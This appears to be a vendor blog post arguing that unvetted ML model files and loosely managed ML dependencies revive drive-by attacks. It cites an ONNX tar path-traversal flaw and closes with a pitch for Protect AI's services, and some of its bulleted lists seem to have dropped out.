Machine learning (ML) has seen rapid adoption across industries, enabling advancements in automation, analytics, and artificial intelligence. However, the rapid growth of ML has also introduced new security concerns. One particularly alarming issue is the way ML models are becoming an attack vector for a familiar but seemingly outdated exploit: drive-by attacks. In the era of Java and Flash vulnerabilities, drive-by attacks were a common way to compromise systems, often requiring nothing more than a visit to a malicious website to unknowingly trigger an exploit. Now, the same approach is making a resurgence through ML dependencies and models.
Unlike traditional software development, ML dependency management operates in a chaotic and loosely controlled ecosystem. ML engineers frequently download vast amounts of dependencies for their development environments, often pulling in extensive packages and libraries as part of experimentation, without carefully scoping them to specific projects. The focus on experimentation and speed often leads to:
This creates a perfect storm of unmonitored and out-of-date libraries, many of which contain vulnerabilities that are rarely scrutinized because they are seen as dependencies used for experimentation and development and are not held to the same standard as production dependencies.
Many ML dependencies, especially those recognized as development libraries, contain vulnerabilities capable of Arbitrary Code Execution (ACE). Traditionally, these vulnerabilities posed a limited threat unless an application's code explicitly invoked the affected functions. As a result, most security measures focus on Source Composition Analysis (SCA) to scan applications consuming these dependencies. However, the ML ecosystem challenges this traditional model.
One of the most concerning aspects of this attack vector is that victims would rarely, if ever, realize that a model or a Hugging Face repository contains a malicious payload. Attackers can embed payloads in various components such as model files, weights, configuration files, binary files, and Python scripts. Loading a compromised model is as simple as downloading a file and calling the library’s .load() method. Many libraries even allow entire repositories to be loaded with a single command. Given that payloads can be obfuscated within model files, manually identifying vulnerabilities is nearly impossible, making this an especially insidious form of attack.
A real-world example of this was discovered by a huntr security researcher, highlighting the risks posed by malicious models. The vulnerability exists in the download_model_with_test_data function, which does not adequately prevent malicious tar files from performing path traversal attacks. This allows attackers to overwrite any file on the system, impacting integrity and availability, with potential consequences such as:
This vulnerability, present in the ONNX framework, is easily importable, making it a significant risk when dealing with unverified ML models. The increasing consumption of third-party ML models, combined with the lack of strict dependency management, exacerbates this risk. Attackers can exploit this in a new type of attack chain:
This mirrors the drive-by download attacks of the past, where visiting a malicious website with an outdated version of Java or Flash could silently compromise a workstation.
To defend against this new attack vector, organizations and ML engineers must adopt stronger security practices in dependency management and model verification:
The parallels between ML-based drive-by attacks and the notorious Java/Flash drive-bys highlight a critical blind spot in modern cybersecurity. As ML continues to evolve, so too must the security practices surrounding it. Recognizing ML models as potential attack vectors and strengthening dependency security measures will be essential in mitigating these threats before they escalate into widespread exploitation. The past has already shown us what happens when we ignore the risks of unmanaged dependencies—now, it's time to apply those lessons to the ML landscape.
Protect AI is ready to assist in tackling these risks. Get in touch to explore existing and future solutions designed to safeguard ML environments against emerging threats.